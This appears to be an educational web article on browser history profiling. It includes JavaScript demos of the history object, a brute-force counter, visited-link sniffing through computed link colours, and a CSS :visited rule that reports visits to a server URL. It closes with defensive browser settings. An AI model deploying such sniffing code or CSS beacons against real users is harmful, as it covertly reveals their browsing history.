History Profiling

JavaScript & CSS
Browser History Revealed

JavaScript History Object

Most web browsers contain a history object whose function is to maintain a list of URLs or website addresses, that is updated each time the browser requests a new page; the web browsing history.

The URLs in the history object are not directly accessible via JavaScript. Restricting direct access to the list of URLs visited was a deliberate design decision of most browser manufacturers. There are privacy concerns if every website was able to directly access all the browsing history of their users.

window.history properties & methods
Name Description Type
length Number of history entries. variable
current Current page ( not readable ). variable
previous Previous page ( not readable ). variable
next Next page ( not readable ). variable
forward Forward one page in history. method
forward Forward one page in history. method
back Back one page in history. method
item Returns value in list ( not readable ). method
go Go to a domain or numerical position in list. method

The not readables are the attempt to keep the privacy of the URLs visited from JavaScript, they can only be used with signed scripts and the user's permission. So, the default model only really allows for length, back, forward and go.

Length does leak some information, for example you could possibly tell if someone had set their homepage to your website, or that it was early on in a browsing session ( later would be harder to detect as history is not always flushed ). But, this is not great grounds for privacy invasion.

Length is also limited, in a number of browsers, to the object history is associated with. e.g. opening a new tab or window should result in a new history object for that window.

The go method allows a domain or numeric to be entered so the browser is redirected to that page in history. A numeric is either positive or negative and moves relative to the current position. Or go takes a domain and matches backwards until it gets a match, technically it just matches a string.

Back and forward just act as if the browser forward or back buttons have been pressed.

The history object is quite useful for the web developer when they wish to offer the user some added functionality. The history.back() has perhaps the most common usage, allowing the user to quickly return to the page they came from.


window.history.back()

history.back() is the more commonly used example of the history object. When called it takes the user back to the page they came from.

The actual URL the browser ends up on is not readable by the JavaScript that calls history.back() so there is no information leakage here. Really it is just a handy feature to offer users, allowing them to go back a page where their process through your site or onto your site is not revealed.

Combined with history.forward(), you can embed the browser forward and back buttons anywhere you like on a page for the user's convenience.

JavaScript history.back() example.
crtBack('backbteg');

function crtBack(parentID) {
    // create a back button

    var parentEle = getEle(parentID);

    var txt = crtTxt('< < < BACK');

    var bt = crtEle('span');

    bt.onclick = function (evt) {
        window.history.back();
    };

    bt.className = 'button';

    bt.appendChild(txt);

    clrEle(parentEle);

    parentEle.appendChild(bt);
}
//----------------------------------------------------------
Click code to run.
back example output.

window.history.go()

window.history.go() has a bit more meat to it, than history.back(). history.go(-1) is equivalent to history.back(). But, you could also specify history.go(-3), or history.back('google.co,uk'). The later capability of specifying a string though, is where the history object starts to leak information.

Whilst history.go() has more features than the back or forward method, most of the extra features are not that usable for web developers in creating extra benefits for the user. So, on balance the go method itself does not seem that useful.

history.go(string) also no longer works in a number of browsers. That was perhaps the more interesting of go's features, but it did offer the potential for a brute force attack, which we will get to later on.

JavaScript history.go(integer) example.
crtGo('gobteg');

function crtGo(parentID) {
    // create go example

    var parentEle = getEle(parentID);

    clrEle(parentEle);

    // assume last page in history chain

    var history_length = window.history.length;

    var max   = history_length;
    var lower = 0;

    if ( history_length > 10 ) {

        max   = history_length - 10;
        lower = Math.floor(Math.random() * max);
    }

    for ( var k = lower + 1; k < max; ++k ) {

        var txt = crtTxt("-" + k);

        var bt = crtEle('span');

        bt.className = 'button';

        bt.title = "Go back " + k;

        bt.goby = k * -1;

        bt.onclick = function(evt) {
            window.history.go(this.goby);
        };

        bt.appendChild(txt);

        parentEle.appendChild(bt);
    }
}
//----------------------------------------------------------
Click code to run.
go example output.

Brute Forcing

Brute force in computing is used to describe situations where the computational power and speed of a computer is used to try out various combinations, in an attempt to unlock, decrypt or decode something.

Computers can loop very quickly through a set of instructions each time changing the values of their attempt, and can be left running sometimes for months in an attempt to crack a code. Sometimes the combination space is too large for an attempt to be made on every combination, and for those instances dictionary attacks or rainbow tables of weak keys can be used instead, this reduces the combinations but unless the person securing has been cautious it often results in a key being compromised.

Imagine a tumbler lock of 4 digits, the range of number would be from 0000 to 9999, or ten thousand combinations. A human would have to try for a fair bit of time until they found the combination ( on average 5,000 attempts ) but if a computer could use the tumbler the speed would be a lot greater.

BruteForce example.
crtBrute('brutebteg');

function crtBrute(parentID) {
    // create brute force example

    var parentEle = getEle(parentID);

    clrEle(parentEle);

    if ( 'timeo' in parentEle )
       clearTimeout(parentEle.timeo);

    var randNum = Math.floor(Math.random() * 10000);
    var randStr = padZeroes(randNum, 4);

    for ( var k = 0; k < 4; ++k ) {

        var disp = crtEle('span');
        disp.className = 'display';

        var rdigit = randStr.substr(k, 1);

        disp.appendChild(crtTxt(rdigit));

        parentEle.appendChild(disp);
    }

    var sep = crtEle('span');

    sep.className = 'sep';

    sep.appendChild( crtTxt(".::.") );

    parentEle.appendChild( sep );

    guessStr = padZeroes(0, 4);

    for ( var k = 0; k < 4; ++k ) {

        var guess = crtEle('span');

        guess.id        = 'guess' + k;
        guess.className = 'guess';

        var gdigit = guessStr.substr(k, 1);

        guess.appendChild(crtTxt(gdigit));

        parentEle.appendChild(guess);
    }

    parentEle.guess   = 0;
    parentEle.randNum = randNum;
    parentEle.k       = 0;
    parentEle.timeo   = setTimeout(guessRun, 1);
}
//----------------------------------------------------------

function guessRun() {
    // guess run

    var parentEle = getEle('brutebteg');

    var target = parentEle.randNum

    var brute = parentEle.guess;

    ++brute;

    if ( brute < 10000 ) {

        var bruteStr = padZeroes(brute, 4);

        for ( var k = 0; k < 4; ++k ) {

            var guess = getEle('guess' + k );

            var gdigit = bruteStr.substr(k, 1);

            guess.firstChild.nodeValue = gdigit;
        }

        if (brute != target) {

            parentEle.guess = brute;
            parentEle.timeo = setTimeout(guessRun, 1);
        }
    }
}
//----------------------------------------------------------
Click code to run.

The above code has been slowed down to allow display updating, without allowing the display of the guess numbers it will typically find the target in under one second.

Brute force example output.

Visited Links

Browsers, by default, like to show a distinction between a link to a page that the browser has seen before, and a link to page that is new to the browser. A link is either fresh ( no history entry ) or visited ( a history entry ).

Not all of the above may be green, but those links that are, show the sites that the browser has already visited.

Not all of the above may be red, but those links that are, show the sites that the browser has not yet visited.

Instead of saying the browser has visited or not, it would be more accurate to say the sites in, or not in, the browser history listing. This distinction is an important one, and is ultimately how you defend against browser history profiling.

It is possible in both JavaScript and CSS to inform the web server ( or any server for that matter, to a degree ), which are the fresh links and which the visited links.

The links above were hard coded, but this time the lists will be output depending on them being either visited or fresh links. There is no communication back to the server, as to the state of these links, so you are not revealing which links you have visited. But, the point to realise is there could be.

Visited links example.
crtVisited('visitedout');

function crtVisited(parentID) {
    // create visited example

    var parentEle = getEle(parentID);

    if ( ! ('testLinks' in parentEle) )
        crtTestLinks(parentEle);

    var testLinks = parentEle.testLinks;

    var tbody = getEle('visitedout');

    for (var k = 0; k < testLinks.length; ++k) {

        var url  = testLinks[k].url;
        var desc = testLinks[k].desc;

        var aLink = crtEle('a');

        aLink.href = url;
        aLink.appendChild( crtTxt(desc) );

        var td1 = crtEle('td');
        td1.className = "lower";

        td1.appendChild( crtTxt(url) );

        var td2 = crtEle('td');

        td2.appendChild( aLink );

        var td3 = crtEle('td');
        td3.rowSpan   = "2";
        td3.className = "lower";

        if (window.getComputedStyle)
            var color = window.getComputedStyle(
                aLink, null).color;

        else if (aLink.currentStlye)
            var color = aLink.currentStyle.color;

        else
            color = "rgb(153, 0, 0)";

        var tr1 = crtEle('tr');

        tr1.appendChild(td2)

        tbody.appendChild(tr1)

        if ( color == "rgb(0, 153, 0)" )
            td3.appendChild(
                crtTxt("Visited") );

        else
            td3.appendChild(
                crtTxt("Fresh") );

        tr1.appendChild(td3);

        var tr2 = crtEle("tr");

        tr2.appendChild(td1);

        tbody.appendChild(tr2);
    }
}
//----------------------------------------------------------

function crtTestLinks(ele) {
    // create test links

    var testLinks = new Array();

    var urls =
        "http://www.cybersecurity.org.uk/articles/histroy_profiling.htm," +
        "http://www.cybersecurity.org.uk," +
        "http://www.google.com," +
        "http://www.google.co.uk," +
        "http://www.yahoo.com," +
        "http://www.poisedsolutions.com," +
        "http://www.poisedcontacts.com," +
        "http://www.beautifulbalms.com," +
        "http://www.net-a-porter.com," +
        "http://www.poisedsolutions.com/binarymagick/";

    var descs =
        "History Profiling @ CyberSecurity (this page)," +
        "Cyber Security Home Page," +
        "gooogle.com," +
        "google.co.uk," +
        "yahoo.com," +
        "Poised Solutions - IT Development UK," +
        "Poised Contacts - Fresh look at IT recruitment.," +
        "Beautiful Balms - handmade creams and aqua flower essences.," +
        "Net-a-porter - cutting edge designer clothing and accessories.," +
        "Binary Magick - binary tricks";

    var urlsA  = urls.split(",");
    var descsA = descs.split(",");

    for ( var k = 0; k < urlsA.length; ++k ) {

        var testLink = new Object();

        testLink.url  = urlsA[k];
        testLink.desc = descsA[k];

        testLinks.push(testLink);
    }

    ele.testLinks = testLinks;
}
//----------------------------------------------------------
Click code to run.

The core of this profiling is based on the ability to access the computed style or current style of an element. It should also be remembered that the links had to be supplied, so this could be done with a huge number of domains, and brute forcing the profiling.


CSS Profiling Solo

There is a way to do this without the use of JavaScript, and that is to take advantage of the fact that CSS contains a few mechanisms to make a call to an external resource.

I won't actually implement this method here, primarily because I don't want to tie up a server resource processing the results, but I will demonstrate how this is done.

a:visited.poisedsolutions {
    background :
        url('/visited?poisedsolutions')
        no-repeat bottom left;
}

An anchor tag is then inserted somewhere in the document with the appropriate class name and href. When the tag is rendered the browser will make a call to /visited with a query string of denoting the site, if the site has been visited.


Defending Against History Profiling

Securing against history profiling in Mozilla Firefox is not that hard, but you will lose the different coloured links, and more importantly the History pages. Though, forward and back will still work. So, perhaps there will be improvement with this in the near future.

Main Menu -> Edit -> Preferences
Firefox Preferences Dialog
Privacy Tab
Uncheck - Remember visited pages...


Conclusion

Many companies are already profiling people who use the web, and there are a lot of people who are trying to limit or stop the profiling as well.

Some people will not care that any website they visit has a limited ability to work out which sites or pages they may have visited before, some may even see it as a service. There is quite a lot we can do with that knowledge in terms of offering things that are more tailored to consumer tastes.

Profiling is double edged though, and certain information can be used against you, so it is prudent to know when to allow history access and when it is not. In most instances it should be enough just to ask if the customer wishes to avail themselves of this service. And if you are using your browser for activities such as online banking, then it is wise to use a separate browser instance, or make sure banking is done in one session, and the browser history cleared afterwards.



Site Designed & Developed by Poised Solutions

If you wish to discuss hiring Poised Solutions for an IT project
please get in contact or visit the Poised Solutions IT Consultancy Website.

Poised Solutions is based in the Thames Valley area of the United Kingdom.
Offering a range of bespoke software and web development solutions,
with unix & linux administration.